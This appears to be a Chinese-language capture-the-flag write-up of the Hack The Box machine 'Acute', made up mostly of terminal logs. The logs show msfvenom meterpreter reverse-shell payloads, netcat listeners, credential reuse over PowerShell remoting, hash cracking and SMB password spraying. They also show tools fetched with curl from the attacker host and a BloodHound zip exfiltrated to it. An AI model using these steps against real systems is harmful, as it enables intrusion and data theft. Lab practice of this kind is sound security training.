└─$ sudo nmap -sS 10.10.11.145 -p- --min-rate=3000 Nmap scan report for 10.10.11.145 Host is up (1.0s latency). Not shown: 65534 filtered tcp ports (no-response) PORT STATE SERVICE 443/tcp open https
└─$ sudo nmap -sS 10.10.11.145 -p443 -sCV --min-rate=3000 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-05 22:11 EST Nmap scan report for 10.10.11.145 Host is up (0.58s latency).
PORT STATE SERVICE VERSION 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | ssl-cert: Subject: commonName=atsserver.acute.local | Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver | Not valid before: 2022-01-06T06:34:58 |_Not valid after: 2030-01-04T06:34:58 |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found | tls-alpn: |_ http/1.1 |_ssl-date: 2025-03-06T02:54:15+00:00; -17m47s from scanner time. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
https://atsserver.acute.local/New_Starter_CheckList_v7.docx Resolving atsserver.acute.local (atsserver.acute.local)... 10.10.11.145 Connecting to atsserver.acute.local (atsserver.acute.local)|10.10.11.145|:443... connected. WARNING: The certificate of ‘atsserver.acute.local’ is not trusted. WARNING: The certificate of ‘atsserver.acute.local’ doesn't have a known issuer. HTTP request sent, awaiting response... 200 OK Length: 34566 (34K) [application/vnd.openxmlformats-officedocument.wordprocessingml.document] Saving to: ‘New_Starter_CheckList_v7.docx’
New_Starter_CheckList_v7.docx 100%[=========================================================================================================>] 33.76K --.-KB/s in 0.03s
└─$ exiftool New_Starter_CheckList_v7.docx ExifTool Version Number : 13.00 File Name : New_Starter_CheckList_v7.docx Directory : . File Size : 35 kB File Permissions : -rw-rw-r-- File Type : DOCX File Type Extension : docx MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document Zip Required Version : 20 Zip Bit Flag : 0x0006 Zip Compression : Deflated Zip Modify Date : 1980:01:01 00:00:00 Zip CRC : 0x079b7eb2 Zip Compressed Size : 428 Zip Uncompressed Size : 2527 Zip File Name : [Content_Types].xml Creator : FCastle Description : Created on Acute-PC01 Last Modified By : Daniel Revision Number : 8 Last Printed : 2021:01:04 15:54:00Z Create Date : 2021:12:08 14:21:00Z Modify Date : 2021:12:22 00:39:00Z Template : Normal.dotm Total Edit Time : 2.6 hours Pages : 3 Words : 886 Characters : 5055 Application : Microsoft Office Word Doc Security : None Lines : 42 Paragraphs : 11 Scale Crop : No Heading Pairs : Title, 1 Titles Of Parts : Company : University of Marvel Links Up To Date : No Characters With Spaces : 5930 Shared Doc : No Hyperlinks Changed : No App Version : 16.0000
得到如下信息,创建者FCastle,主机名Acute-PC01
1 2
Creator : FCastle Description : Created on Acute-PC01
一份培训工作相关的文档,在文档中包含一部分web路径,以及相关敏感信息等
这里超链接到一个web路径
这里表示,只有lois有权限更改用户权限,并只有lois可以成为site admin(站点管理员)
Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin.
└─$ nc -lvnp 10086 listening on [any] 10086 ... connect to [10.10.16.4] from (UNKNOWN) [10.10.11.145] 49785 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
C:\Windows\system32>qwinsta SESSIONNAME USERNAME ID STATE TYPE DEVICE services 0 Disc >console edavies 1 Active 31c5ce94259d4... 65536 Listen
正常情况下靶机是很少出现有用户开着rdp连着的,所以这里得去下rdp连上后做了什么操作
这里用msf做屏幕监视,cs用不习惯
1 2 3 4 5 6 7 8
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=10087 -f exe -o t.exe Warning: KRB5CCNAME environment variable not supported - unsetting [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes Saved as: t.exe
msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > show options
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Wildcard Target
加一下配置然后起监听
1 2 3 4 5 6 7 8 9
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.16.4 LHOST => 10.10.16.4 msf6 exploit(multi/handler) > set LPORT 10087 LPORT => 10087 msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.4:10087
运行马子
1
PS C:\Utils> .\t.exe
然后拿到了一个shell
1 2 3 4 5 6 7
msf6 exploit(multi/handler) > sessions Active sessions ===============
Id Name Type Information Connection -- ---- ---- ----------- ---------- 58 meterpreter x64/windows ACUTE\edavies @ ACUTE-PC01 10.10.16.4:10087 -> 10.10.11.145:49793 (172.16.22.2)
PS C:\utils> Get-PSSessionConfiguration Get-PSSessionConfiguration Get-PSSessionConfiguration : Access is denied. To run this cmdlet, start Windows PowerShell with the "Run as administrator" option. At line:1 char:1 + Get-PSSessionConfiguration + ~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [Get-PSSessionConfiguration], InvalidOperationException + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetPSSessionConfiguration Command
PS C:\utils> $passwd = ConvertTo-SecureString"W3_4R3_th3_f0rce."-AsplainText-Force $passwd = ConvertTo-SecureString"W3_4R3_th3_f0rce."-AsplainText-Force PS C:\utils> $cred = New-Object System.Management.Automation.PSCredential("acute\imonks",$passwd) $cred = New-Object System.Management.Automation.PSCredential("acute\imonks",$passwd) PS C:\utils> Invoke-Command-ComputerName ATSSERVER -ConfigurationName dc_manage -Credential$cred-ScriptBlock { Get-Culture } Invoke-Command-ComputerName ATSSERVER -ConfigurationName dc_manage -Credential$cred-ScriptBlock { Get-Culture } The term 'Get-Culture' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. + CategoryInfo : ObjectNotFound: (Get-Culture:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException + PSComputerName : ATSSERVER
PS C:\Utils> Invoke-Command-ComputerName ATSSERVER -ConfigurationName dc_manage -Credential$cred-ScriptBlock {$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51';$passwd = $securepasswd | ConvertTo-SecureString;$creds = New-Object System.Management.Automation.PSCredential("acute\jmorgan", $passwd);Invoke-Command-ScriptBlock {Get-Volume} -ComputerName Acute-PC01-Credential$creds} Invoke-Command-ComputerName ATSSERVER -ConfigurationName dc_manage -Credential$cred-ScriptBlock {$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51';$passwd = $securepasswd | ConvertTo-SecureString;$creds = New-Object System.Management.Automation.PSCredential("acute\jmorgan", $passwd);Invoke-Command-ScriptBlock {Get-Volume} -ComputerName Acute-PC01-Credential$creds} The term 'ConvertTo-SecureString' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. + CategoryInfo : ObjectNotFound: (ConvertTo-SecureString:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException + PSComputerName : ATSSERVER The term 'New-Object' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. + CategoryInfo : ObjectNotFound: (New-Object:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException + PSComputerName : ATSSERVER The term 'Invoke-Command' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. + CategoryInfo : ObjectNotFound: (Invoke-Command:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException + PSComputerName : ATSSERVER
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=10089 -f exe -o a.exe Warning: KRB5CCNAME environment variable not supported - unsetting [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes Saved as: a.exe
改一下监听,后台运行
1 2 3 4 5 6 7
msf6 exploit(multi/handler) > set LPORT 10089 LPORT => 10089 [*] Started reverse TCP handler on 10.10.16.4:10089 msf6 exploit(multi/handler) > exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf6 exploit(multi/handler) >
─$ nc -lvnp 10088 listening on [any] 10088 ... connect to [10.10.16.4] from (UNKNOWN) [10.10.11.145] 49840 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
User Name SID ============= ============================================== acute\jmorgan S-1-5-21-1786406921-1914792807-2072761762-1108
GROUP INFORMATION -----------------
Group Name Type SID Attributes ========================================== ================ ============ =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ========================================= ================================================================== ======= SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeUndockPrivilege Remove computer from docking station Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION -----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
└─$ hashcat hash /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting in autodetect mode OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ============================================================================================================================================ Hash-mode was not specified with -m. Attempting to auto-detect hash mode. The following mode was auto-detected as the only one matching your input hash: 1000 | NTLM | Operating System
------------------------------------------------------------------------------- Administrator awallace chall edavies Guest imonks jmorgan krbtgt lhopkins The command completed with one or more errors.
这里想直接对着172.16.22.1喷密码,所以加一下路由先
1 2 3 4 5 6 7 8 9 10 11
msf6 exploit(multi/handler) > sessions -l
Active sessions ===============
Id Name Type Information Connection -- ---- ---- ----------- ---------- 60 meterpreter x64/windows ACUTE\edavies @ ACUTE-PC01 10.10.16.8:10087 -> 10.10.11.145:49878 (172.16.22.2)
msf6 auxiliary(scanner/smb/smb_login) > set user_file userlistt user_file => userlistt
发现直接跑好像有点问题
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
sf6 auxiliary(scanner/smb/smb_login) > set SMBDomain 'acute.local' SMBDomain => acute.local msf6 auxiliary(scanner/smb/smb_login) > rerun [*] Reloading module... [*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
Invoke-Command-ComputerName ATSSERVER -Credential$cred-ConfigurationName dc_manage -ScriptBlock { ls ~ }
1 2 3 4 5 6 7 8 9 10
PS C:\Users\jmorgan\Documents> Invoke-Command-ComputerName ATSSERVER -ConfigurationName dc_manage -Credential$cred-ScriptBlock { net user /domain Invoke-Command-ComputerName ATSSERVER -ConfigurationName dc_manage -Credential$cred-ScriptBlock { net user /domain}
User accounts for \\
------------------------------------------------------------------------------- Administrator awallace chall edavies Guest imonks jmorgan krbtgt lhopkins The command completed with one or more errors.
User Name SID ============== ============================================== acute\awallace S-1-5-21-1786406921-1914792807-2072761762-1104
GROUP INFORMATION -----------------
Group Name Type SID Attributes ========================================== ================ ============================================== ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group ACUTE\Managers Group S-1-5-21-1786406921-1914792807-2072761762-1111 Mandatory group, Enabled by default, Enabled group Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ============================= ============================== ======= SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
------------------------------------------------------------------------------- Administrator awallace chall edavies Guest imonks jmorgan krbtgt lhopkins The command completed with one or more errors.
Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin.
Invoke-Command-ComputerName ATSSERVER -Credential$cred-ConfigurationName dc_manage -ScriptBlock {net groups /domain}
Group Accounts for \\
------------------------------------------------------------------------------- *Cloneable Domain Controllers *DnsUpdateProxy *Domain Admins *Domain Computers *Domain Controllers *Domain Guests *Domain Users *Enterprise Admins *Enterprise Key Admins *Enterprise Read-only Domain Controllers *Group Policy Creator Owners *Key Admins *Managers *Protected Users *Read-only Domain Controllers *Schema Admins *Site_Admin The command completed with one or more errors
其中有一个*Site_Admin组别
1 2 3 4 5 6 7 8 9
PS C:\utils> Invoke-Command-ComputerName ATSSERVER -Credential$cred-ConfigurationName dc_manage -ScriptBlock {net group Site_Admin /domain} Invoke-Command-ComputerName ATSSERVER -Credential$cred-ConfigurationName dc_manage -ScriptBlock {net group Site_Admin /domain} Group name Site_Admin Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
------------------------------------------------------------------------------- The command completed successfully.
留了一个备注给这个组,只有紧急情况才让用这个组,然后这个组可以操作domain admins说是
Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net user lhopkins /domain} User name lhopkins Full Name Lois Hopkins Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 21/12/2021 14:51:53 Password expires Never Password changeable 22/12/2021 14:51:53 Password required Yes User may change password No Workstations allowed All Logon script User profile Home directory Last logon 14/03/2025 13:58:26 Logon hours allowed All Local Group Memberships Global Group memberships *Domain Users The command completed successfully. PS C:\utils> PS C:\utils> date date 14 March 2025 14:01:27
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { net user awallace /domain} User name awallace Full Name Aileen Wallace Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 21/12/2021 14:50:36 Password expires Never Password changeable 22/12/2021 14:50:36 Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 14/03/2025 14:29:59 Logon hours allowed All Local Group Memberships Global Group memberships *Domain Users *Managers *Site_Admin The command completed successfully.
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls ~ } Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls ~ } [ATSSERVER] Connecting to remote server ATSSERVER failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic. + CategoryInfo : OpenError: (ATSSERVER:String) [], PSRemotingTransportException + FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { curl 10.10.16.8/nc64.exe -o C:/a.exe} Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { curl 10.10.16.8/nc64.exe -o C:/a.exe} The term 'curl.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. + CategoryInfo : ObjectNotFound: (curl.exe:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException + PSComputerName : ATSSERVER
─$ nc -lvnp 10088 listening on [any] 10088 ... connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 57496 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
curl 10.10.16.8/SharpHound.exe -o SharpHound.exe PS C:\Users\awallace\Documents> .\SharpHound.exe .\SharpHound.exe 2025-03-11T15:38:19.5992713+00:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound 2025-03-11T15:38:19.6773937+00:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2025-03-11T15:38:19.6930183+00:00|INFORMATION|Initializing SharpHound at 15:38 on 11/03/2025 2025-03-11T15:38:19.7867734+00:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for acute.local : ATSSERVER.acute.local 2025-03-11T15:38:19.8023986+00:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2025-03-11T15:38:19.8962192+00:00|INFORMATION|Beginning LDAP search for acute.local 2025-03-11T15:38:19.9117741+00:00|INFORMATION|Producer has finished, closing LDAP channel 2025-03-11T15:38:19.9117741+00:00|INFORMATION|LDAP channel closed, waiting for consumers 2025-03-11T15:38:50.2656371+00:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM 2025-03-11T15:39:03.4265787+00:00|INFORMATION|Consumers finished, closing output channel Closing writers 2025-03-11T15:39:03.4422041+00:00|INFORMATION|Output channel closed, waiting for output task to complete 2025-03-11T15:39:03.4890789+00:00|INFORMATION|Status: 113 objects finished (+113 2.627907)/s -- Using 43 MB RAM 2025-03-11T15:39:03.4890789+00:00|INFORMATION|Enumeration finished in 00:00:43.6059014 2025-03-11T15:39:03.5515810+00:00|INFORMATION|Saving cache with stats: 72 ID to type mappings. 75 name to SID mappings. 0 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings. 2025-03-11T15:39:03.5515810+00:00|INFORMATION|SharpHound Enumeration Completed at 15:39 on 11/03/2025! Happy Graphing!
传出去
1 2 3 4 5
PS C:\Users\awallace\Documents> cmd /c curl -T ./20250311153902_BloodHound.zip 10.10.16.8:81 cmd /c curl -T ./20250311153902_BloodHound.zip 10.10.16.8:81 % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 13348 0 0 100 13348 0 2832 0:00:04 0:00:04 --:--:-- 2832
1 2 3
└─$ nc -lvnp 81 > blood.zip listening on [any] 81 ... connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 57555
